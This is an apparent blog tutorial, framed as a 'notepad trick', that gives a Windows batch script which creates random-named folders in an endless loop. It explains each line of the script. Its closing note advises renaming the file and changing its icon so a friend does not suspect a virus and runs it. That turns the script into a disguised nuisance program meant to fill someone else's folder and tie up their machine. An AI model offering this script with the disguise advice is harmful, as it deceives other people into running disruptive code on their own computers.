Notepad Trick to create more than 3,000 folders in a minute
Open your notepad and type the following code. @echo off :top md %random% goto top Save it as De...
https://www.computersprofessor.com/2016/06/notepad-trick-to-create-more-than-3000.html
Open your notepad and type the following code.
@echo off
:top
md %random%
goto top
Save it as Demo.bat
Copy the file to a folder and open it.
Copy the file to a folder and open it.
Explaining the Above Code Function :
@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folders with random names.
( md is a command to make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop.
NOTE:
1. The folders will get created in the directory where you saved the ”Demo.bat” file.
2. The file might look suspicious to you or your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t suspect the file to be a virus.